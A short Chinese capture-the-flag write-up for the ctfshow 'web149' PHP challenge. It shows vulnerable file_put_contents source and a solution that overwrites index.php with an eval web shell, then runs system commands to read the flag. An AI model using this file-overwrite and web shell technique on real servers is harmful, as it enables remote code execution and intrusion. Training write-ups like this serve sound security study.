目录

  • 源码
  • 思路
  • 题解
  • 总结

源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-19 04:34:40*/error_reporting(0);
highlight_file(__FILE__);$files = scandir('./');
foreach($files as $file) {if(is_file($file)){if ($file !== "index.php") {unlink($file);}}
}file_put_contents($_GET['ctf'], $_POST['show']);$files = scandir('./');
foreach($files as $file) {if(is_file($file)){if ($file !== "index.php") {unlink($file);}}
}

思路

file_put_contents能把字符串输入到文件中,能创建文件也能覆盖掉文件,不是index.php的文件都会被删除,要么条件竞争用多线程趁创建的文件没有被删,访问;要么直接改index.php本身,以为题库是限制访问速率的,所以只能选择后者

题解

get:?ctf=index.php
post:?show=<?php phpinfo();eval($_POST[0]);?>

再访问 看到phpinfo()说明覆盖成功 直接post

0=system("tac /c*");

拿到flag

总结

水题

CTFshow php特性 web149相关推荐

  1. ctfshow php特性 下

    目录 web113 web114 web115 web123(php解析特性) web125 web126 web127(php解析特性) web128 web129 web130 web131 we ...

  2. ctfshow php特性(89——150plus)

    web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num ...

  3. ctfshow php特性 web89-web115 web123-150wp

    php特性 参考博客仍然是南神博客 文章目录 php特性 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web10 ...

  4. CTFshow——PHP特性(下)

    目录: web132--逻辑运算符的优先级 web133--curl -F web134--php变量覆盖 web135-- >xx.txt 写文件 web136-- tee命令 web137- ...

  5. CTFshow php特性 web150plus

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...

  6. CTFshow php特性 web150

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...

  7. CTFshow php特性 web147

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...

  8. CTFshow php特性 web140

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...

  9. CTFshow php特性 web138

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...

最新文章

  1. 网络硬盘与传统资源共享的不同
  2. javascript学习笔记2
  3. elasticsearch 5.x Delete By Query API(根据条件删除)
  4. 什么是Cadence call
  5. 在 react 里写 vue3 ? 还写了自定义 hooks和 Hoc 构建了响应式 !
  6. C++中类的拷贝控制
  7. Java获取登录用户IP地址
  8. 函授计算机大专自我鉴定100字,函授大学毕业自我鉴定100字(精选5篇)
  9. Spring Boot整合MongoDB实现增删改查
  10. hadoop入门简介
  11. ReactNative项目xcode打包运行报错整理
  12. vc++.net 移植到 C#中的几点注意事项
  13. java 拖放文字_Java实现拖放效果
  14. lnmp mysql 命令_LNMP状态管理命令
  15. Hadoop组件及功能
  16. matlab在mac中好用吗,Matlab Mac版上手
  17. 如何设计一张合格的日志表
  18. K近邻算法(k-Nearest Neighbour, KNN)
  19. 塔米狗上的达人名片有什么作用?
  20. python中保留字pass_Python包含的保留字

热门文章

  1. 面试(之)三赴上海易传媒—揭秘之旅
  2. c#实现多线程代码例子
  3. 高通thermal-engine配置文件格式
  4. 我眼中的Linux设备树(六 memorychosen节点)
  5. 数据库sql linux,linux安装mysql数据库
  6. jenkins部署java项目(五)
  7. LVS的简单示例(一)
  8. 【WPF】MVVM模式的3种command
  9. Unity中有两种Animation Clip
  10. div根据内容改变大小并且左右居中